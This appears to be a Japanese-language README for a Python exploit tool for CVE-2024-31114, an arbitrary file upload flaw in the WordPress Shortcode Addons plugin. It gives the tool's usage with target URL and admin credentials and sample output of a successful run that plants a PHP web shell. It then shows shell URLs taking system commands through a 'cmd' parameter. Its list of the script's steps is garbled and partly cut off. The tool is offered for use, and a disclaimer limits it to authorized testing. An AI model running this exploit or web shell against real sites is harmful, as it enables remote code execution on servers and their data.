
Shortcode Addons <= 3.2.5 - 認証済み(管理者以上)任意のファイルアップロード
Shortcode Addons <= 3.2.5 – 認証済み(管理者以上)任意ファイルアップロード
CVE ID: CVE-2024-31114
CVSS スコア: 9.1 (クリティカル)
WordPress 用プラグイン Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension は、バージョン 3.2.5 を含むそれ以前のすべてのバージョンにおいて、ファイルタイプのバリデーションが欠如しているため、任意のファイルアップロードに対して脆弱です。
この欠陥により、管理者権限以上のアクセス権を持つ認証済み攻撃者がサーバーに任意のファイルをアップロードできるようになり、リモートコード実行 (RCE) につながる可能性があります。
この Python スクリプトは脆弱性の悪用を自動化します。以下の処理を実行します:
_wpnonce) の抽出nxploit.php) の生成.zip として圧縮・アップロードwhoami の実行usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
ペイロードがアップロードされると、次の形式でシステムコマンドを実行できます:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 例:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
これにより、サーバー上のカレントディレクトリの内容が一覧表示されます。
このツールは教育目的および許可されたテスト目的のみです。
作者はこのスクリプトの誤用や損害について一切の責任を負いません。
責任を持って使用し、明示的なテスト許可を得たシステムでのみ使用してください。
作成者: Nxploited | Khaled Alenazi